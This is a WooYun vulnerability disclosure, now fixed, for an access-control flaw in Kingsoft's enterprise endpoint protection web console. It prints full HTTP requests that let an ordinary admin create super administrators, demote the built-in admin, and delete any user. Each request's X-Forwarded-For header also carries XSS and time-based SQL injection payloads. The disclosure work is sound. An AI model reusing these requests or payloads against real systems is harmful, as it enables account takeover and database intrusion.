当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-086359

漏洞标题:金山企业终端防护优化系统Web控制台越权添加/修改/删除任意用户(包括超级管理员)

相关厂商:金山毒霸

漏洞作者: xfkxfk

提交时间:2014-12-09 11:15

修复时间:2015-03-09 11:16

公开时间:2015-03-09 11:16

漏洞类型:非授权访问/权限绕过

危害等级:中

自评Rank:10

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-09: 细节已通知厂商并且等待厂商处理中
2014-12-11: 厂商已经确认,细节仅向厂商公开
2015-02-04: 细节向核心白帽子及相关领域专家公开
2015-02-14: 细节向普通白帽子公开
2015-02-24: 细节向实习白帽子公开
2015-03-09: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

金山企业终端防护优化系统Web控制台越权添加/修改/删除任意用户(包括超级管理员)

详细说明:

金山企业终端防护优化系统Web控制台越权添加/修改/删除任意用户,包括超级管理员

此系统的用户角色为:
超级管理员,系统级别,默认无法修改
普通管理员,可修改
审计管理员,可修改
配置管理员,可修改


以普通管理员权限添加超级管理员:

POST /user_manage/user/ajax.kptl HTTP/1.1
Host: 127.0.0.1:6868
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:6868/user_manage/user/main.php?li=4&a=6
Content-Length: 290
X-Forwarded-For: 123"><img/src=1 onerror=alert(1)>127.0.0.1',`email`=(if(mid(user(),1,1)=char(114),sleep(3),0))#
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{"add_user_info_cmd":{"userSession":"FEBE1888-E8C3-4331-9806-85F16C18460D","mode_id":"DDDD9367-96F7-4790-909F-BA8E62D6D452","real_name":"","user_name":"111111","type":"0","tel":"","mobile":"","corp":"","notice":"","psw":"1a100d2c0dab19c4430e7d73762b3423","email":"","VHierarchyID":"ADMIN"}}


这里的type即为管理员类别,0代表超级管理员,1代表普通管理员
这里添加超级管理员用户111111
发送请求后,返回0即代表请求成功

1.png


修改任意用户信息:
可以修改任意角色用户,这里修改系统超级用户admin为普通管理员:

POST /user_manage/user/ajax.kptl HTTP/1.1
Host: 127.0.0.1:6868
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:6868/user_manage/user/main.php?li=4&a=6
Content-Length: 266
X-Forwarded-For: 123"><img/src=1 onerror=alert(1)>127.0.0.1',`email`=(if(mid(user(),1,1)=char(114),sleep(3),0))#
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{"set_user_info_cmd":{"userSession":"E5BCAE25-2475-4D6C-8202-819D1863915A","mode_id":"DDDD9367-96F7-4790-909F-BA8E62D6D452","real_name":"","user_name":"admin","type":"1","tel":"","mobile":"","corp":"","notice":"","psw":"e3ceb5881a0a1fdaad01296d7554868d","email":""}}


2.png


删除任意用户:
这里删除用户222222,因为用户222222,不存在所以返回不是0,为7
把用户名换成存在用户,即可删除任意角色用户

POST /user_manage/user/ajax.kptl HTTP/1.1
Host: 127.0.0.1:6868
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:6868/user_manage/user/main.php?li=4&a=6
Content-Length: 146
X-Forwarded-For: 123"><img/src=1 onerror=alert(1)>127.0.0.1',`email`=(if(mid(user(),1,1)=char(114),sleep(3),0))#
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{"del_user_info_cmd":{"userSession":"FEBE1888-E8C3-4331-9806-85F16C18460D","mode_id":"DDDD9367-96F7-4790-909F-BA8E62D6D452","user_name":"222222"}}


3.png

漏洞证明:

查看执行结果:

4.png


不能修改的超级管理员admin变为可修改的普通管理员
并添加超级管理员111111

修复方案:

普通用户和超级用户权限划分清楚

版权声明:转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-12-11 15:51

厂商回复:

收到,我们将尽快确认并推动修复。

最新状态:

2015-01-13:已修复